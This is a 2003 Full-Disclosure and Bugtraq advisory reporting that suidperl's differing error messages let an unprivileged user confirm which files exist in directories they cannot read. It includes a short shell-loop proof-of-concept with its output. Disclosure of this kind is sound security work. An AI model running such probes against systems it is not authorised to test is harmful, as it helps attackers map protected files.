[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] suidperl path disclosure
- To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
- Subject: [Full-Disclosure] suidperl path disclosure
- From: psz@maths.usyd.edu.au (Paul Szabo)
- Date: Wed, 27 Aug 2003 12:15:56 +1000 (EST)
suidperl can be used for path disclosure (to verify if a file exists
when the user has no access to the directories above). The error
messages returned by suidperl are too revealing: in the examples below
I expected a uniform 'permission denied' or similar.
Set things up as one user (e.g. root):
# pwd
/root/ptest
# ls -al
total 8
drwx------ 2 root root 4096 Jul 30 09:36 .
drwx------ 13 root root 4096 Jul 30 09:35 ..
-rwx------ 1 root root 0 Jul 30 09:36 file
-rws------ 1 root root 0 Jul 30 09:36 sfile
As another (normal) user, use suidperl to disclose path info:
$ id
uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),109(tutsols)
$ for n in nosuch file sfile; do
> echo ''; echo Test $n; suidperl /root/ptest/$n
> done
Test nosuch
Can't open perl script "/root/ptest/nosuch": No such file or directory
Test file
Script is not setuid/setgid in suidperl
Test sfile
Permission denied.
I cannot immediately see how this could be used for a root compromise.
This problem was reported to perlbug@perl.com on 23 Mar 2001, see
http://rt.perl.org/rt2/Ticket/Display.html?id=6511
and to submit@bugs.debian.org on 30 Jul 2003, see
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
but is apparently not being worked on. Mis-quoting from that latter
reference:
Bug has been reported a month (or two years) ago, but those uncaring,
lazy people have done nothing.
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html